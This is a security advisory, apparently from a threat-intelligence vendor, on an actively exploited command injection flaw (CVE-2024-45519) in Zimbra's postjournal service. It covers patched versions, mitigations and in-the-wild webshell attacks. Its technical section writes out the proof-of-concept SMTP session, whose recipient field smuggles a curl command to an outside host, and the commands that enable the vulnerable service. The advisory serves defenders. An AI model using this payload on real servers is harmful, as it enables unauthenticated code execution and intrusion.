Trending

ee-track">
Link copied!

Zimbra Remote Code Execution Vulnerability Under Active Attack

As Zimbra is already a popular target for threat actors, users are urged to patch the postjournal vulnerability as soon as possible.

October 3, 2024 · 3 min read
Zimbra Remote Code Execution Vulnerability Under Active Attack

Key Takeaways

  • A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
  • A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
  • The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.

Overview

A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.

The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.

Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.

Patched versions include these versions and newer:

  • 9.0.0 Patch 41
  • 10.0.9
  • 10.1.1
  • 8.8.15 Patch 46

One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.

Technical Analysis

Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.

report-ad-banner

The researchers reversed the postjournal binary and found that there were no calls to execvp or the run_command function. Instead, a direct call to popen was made in the read_maps function, allowing input to be passed without sanitization. The cmd argument passed to popen in double quotes would prevent command injection with simple shell metacharacters, but that control could be bypassed with $() syntax.

The postjournal service was then exploited via port 10027 with the following SMTP commands:

EHLO localhost

MAIL FROM: <[email protected]>

RCPT TO: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>

DATA

Test message

.

The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:

zmlocalconfig -e postjournal_enabled=true

zmcontrol restart

To enable remote exploit, the researchers found that the mynetworks default configuration included a /20 CIDR range of their public IP address, which could allow the exploit to be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.

Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.

Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if connected, the base64 blobs decode to a command to write a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).

Base64 Zimbra email exploit

Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.

Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:

 cveIDvendorProjectproductvulnerabilityName
CVE-2023-37580ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-27926ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-41352ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-27925ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-37042ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability
CVE-2022-27924ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Command Injection Vulnerability
CVE-2018-6882ZimbraCollaboration Suite (ZCS)Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-24682ZimbraWebmailZimbra Webmail Cross-Site Scripting Vulnerability

While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.

Recommendations

All Zimbra administrators should:

  • Disable postjournal if not needed
  • Configure mynetworks to prevent unauthorized access
  • Apply the latest security updates directly from Zimbra

AI Threat Intelligence

Stop Executive Threats
Before They Strike

Monitor dark web chatter, detect lookalike domains, and protect your C-suite from targeted impersonation — in real time, across 50+ countries.

Scroll to Top

Book your session

Request a Personalized Demo

See how Cyble's threat intelligence protects your organization. A specialist will reach out within one business day.

Select one or more options

Cyble protects your personal data to manage your account and deliver requested content. Submit your details to receive updates. Withdraw consent anytime. See our privacy policy for details.

Your information is encrypted and never shared.
SOC 2 Type II GDPR compliant Trusted by 1,000+ teams

Download the brochure

Get the Cyble Vision Brochure

Explore how Cyble Vision delivers AI-powered threat intelligence across your attack surface. Fill in your details to access the brochure.

Select one or more options

Cyble protects your personal data to manage your account and deliver requested content. Submit your details to receive updates. Withdraw consent anytime. See our privacy policy for details.

Your information is encrypted and never shared.
SOC 2 Type II GDPR compliant Trusted by 1,000+ teams